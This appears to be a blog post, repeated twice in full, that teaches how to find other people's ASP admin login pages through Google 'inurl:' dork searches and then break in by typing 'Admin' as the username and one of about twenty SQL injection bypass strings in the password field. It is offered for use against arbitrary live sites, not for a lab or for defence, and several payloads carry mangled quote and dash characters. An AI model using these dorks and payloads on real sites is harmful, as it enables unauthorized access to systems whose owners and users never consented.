How to Bypass Website Admin Login by SQL Injection.
There might be other ways to find vulnerable sites but to day we will be discussing how we can use google to our advantage ;)
Search any of these in Google without Quoutes
"inurl:admin.asp"
"inurl:login/admin.asp"
"inurl:admin/login.asp"
"inurl:adminlogin.asp"
"inurl:adminhome.asp"
"inurl:admin_login.asp"
"inurl:administratorlogin.asp"
"inurl:login/administrator.asp"
"inurl:administrator_login.asp"
There are More Dorkseven
Now Go to Admin Panel and Type Admin as Username
(Common One)
and in Password we Type Our SQLInjection
Here is a list of sql injections.
' or '1′='1
' or 'x'='x
' or 0=0 –
or 0=0 –
' or 0=0 #
" or 0=0 #
or 0=0 #
' or 'x'='x
" or "x"="x
') or ('x'='x
' or 1=1–
" or 1=1–
or 1=1–
' or a=a–
" or "a"="a
') or ('a'='a
") or ("a"="a
hi" or "a"="a
hi" or 1=1 –
hi' or 1=1 –
'or'1=1′
TYPE ANY ONE OF THESE IN PASSWORD SPACE… There
are many more but these are the best ones that i know.
**NOTE not all sites are vulnerable.**
Search any of these in Google without Quoutes
"inurl:admin.asp"
"inurl:login/admin.asp"
"inurl:admin/login.asp"
"inurl:adminlogin.asp"
"inurl:adminhome.asp"
"inurl:admin_login.asp"
"inurl:administratorlogin.asp"
"inurl:login/administrator.asp"
"inurl:administrator_login.asp"
There are More Dorkseven
Now Go to Admin Panel and Type Admin as Username
(Common One)
and in Password we Type Our SQLInjection
Here is a list of sql injections.
' or '1′='1
' or 'x'='x
' or 0=0 –
or 0=0 –
' or 0=0 #
" or 0=0 #
or 0=0 #
' or 'x'='x
" or "x"="x
') or ('x'='x
' or 1=1–
" or 1=1–
or 1=1–
' or a=a–
" or "a"="a
') or ('a'='a
") or ("a"="a
hi" or "a"="a
hi" or 1=1 –
hi' or 1=1 –
'or'1=1′
TYPE ANY ONE OF THESE IN PASSWORD SPACE… There
are many more but these are the best ones that i know.
**NOTE not all sites are vulnerable.**
coba
ReplyDelete